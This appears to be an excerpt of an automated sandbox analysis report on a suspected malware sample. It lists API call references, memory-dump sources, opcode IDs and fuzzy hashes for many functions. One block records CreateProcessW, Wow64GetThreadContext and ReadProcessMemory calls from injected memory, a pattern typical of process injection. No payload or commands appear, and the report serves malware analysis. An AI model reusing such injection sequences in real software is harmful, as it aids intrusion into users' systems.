                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _malloc$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 680241177-0
                                                                        • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                        • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                        APIs
                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Message$DispatchPeekTranslate
                                                                        • String ID:
                                                                        • API String ID: 4217535847-0
                                                                        • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                        • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                        • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                        • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 004678F7
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__wsplitpath_malloc
                                                                        • String ID:
                                                                        • API String ID: 4163294574-0
                                                                        • Opcode ID: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                                        • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                        • Opcode Fuzzy Hash: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                                        • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                        APIs
                                                                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                        • _strcat.LIBCMT ref: 0040F786
                                                                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3199840319-0
                                                                        • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                        • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                        • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                        • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                        • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                        • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                        • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                        APIs
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        • __lock_file.LIBCMT ref: 00414A8D
                                                                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                        • __fclose_nolock.LIBCMT ref: 00414A98
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2800547568-0
                                                                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 00415012
                                                                        • __ftell_nolock.LIBCMT ref: 0041501F
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2999321469-0
                                                                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03D987A3
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03D98839
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03D9885B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2130234126.0000000003D96000.00000040.00000020.00020000.00000000.sdmp, Offset: 03D96000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d96000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                        • Instruction ID: 40f3736cd017cd285e6d6756c55c79e99e3c10685fab4cef4dd99efcc5fd3dfa
                                                                        • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                        • Instruction Fuzzy Hash: 0712DD24E24658C6EB24DF64D8507DEB232EF68700F1090E9910DEB7A5E77A4F81CF5A
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                                                                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                        • Opcode Fuzzy Hash: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                                                                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                        • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                        • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                        • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                        • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                        • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                        • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _memmove.LIBCMT ref: 00444B34
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _malloc_memmove
                                                                        • String ID:
                                                                        • API String ID: 1183979061-0
                                                                        • Opcode ID: 2b93bc58ca1a4befc50711bb88b1a44cc78799b6a6930b0e7ec3687d2c92375e
                                                                        • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                                        • Opcode Fuzzy Hash: 2b93bc58ca1a4befc50711bb88b1a44cc78799b6a6930b0e7ec3687d2c92375e
                                                                        • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __lock_file
                                                                        • String ID:
                                                                        • API String ID: 3031932315-0
                                                                        • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                        • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                        • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                        • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                        • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                        • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                        • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __wfsopen
                                                                        • String ID:
                                                                        • API String ID: 197181222-0
                                                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                        • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                        • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                        APIs
                                                                        • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle
                                                                        • String ID:
                                                                        • API String ID: 2962429428-0
                                                                        • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                        • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                        • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                        • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
